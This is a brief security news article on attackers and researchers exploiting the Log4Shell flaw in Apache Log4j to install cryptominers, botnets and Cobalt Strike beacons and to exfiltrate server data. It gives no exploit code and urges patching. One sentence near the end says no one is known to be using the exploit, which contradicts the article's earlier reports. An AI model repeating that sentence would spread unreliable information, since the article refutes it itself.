An exploit for Log4Shell vulnerability in the Apache Log4j logging platform was released two days ago.
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers.
An exploit for a critical zero-day vulnerability dubbed ‘Log4Shell’ in the Apache Log4j Java-based logging platform was publicly released two days ago. This vulnerability allows attackers to remotely execute a command on a vulnerable server by searching for or changing the browser’s user agent to a special string.
Apache immediately released Log4j 2.15.0 to resolve the vulnerability, but the hackers have already started to scan for and exploit vulnerable servers to exfiltrate data, install malware, or take over the server.
This software is used in thousands of enterprise applications and websites.
As soon as the vulnerability was released, the threat actors exploited the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers.
The threat actors behind the Kinsing backdoor and cryptomining botnet are abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts.
This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.
According to Netlab 360, the threat actors exploit the vulnerability to install the Mirai and Muhstik malware on vulnerable devices.
These malware families recruit IoT devices and servers into their botnets and use them to deploy cryptominers and perform large-scale DDoS attacks.
The Log4j vulnerabilities are also being exploited to drop Cobalt Strike beacons.
Cobalt Strike is a legitimate penetration testing toolkit where red teams deploy agents, or beacons, on “compromised” devices to perform remote network surveillance or execute further commands.
Threat actors use cracked versions of Cobalt Strike as part of network breaches and during ransomware attacks.
Besides using the Log4Shell exploits to install malware, threat actors and security researchers are using the exploit to scan for vulnerable servers and exfiltrate information from them.
Researchers use the exploit to force vulnerable servers to access URLs or perform DNS requests for callback domains. It helps to determine if the server is vulnerable and use it for future attacks, research, or attempts to claim a bug bounty award.
Some researchers even use the exploit to exfiltrate environment variables that contain server data without permission, including the host’s name, the user name the Log4j service is running under, the operating system name, and OS version number.
Even though there has been no public research showing that anyone is utilising the Log4j exploit, the fact that Cobalt Strike beacons have been deployed means these attacks are imminent.
So it is highly recommended that all users must install the latest version of Log4j or affected applications to resolve this vulnerability at the earliest.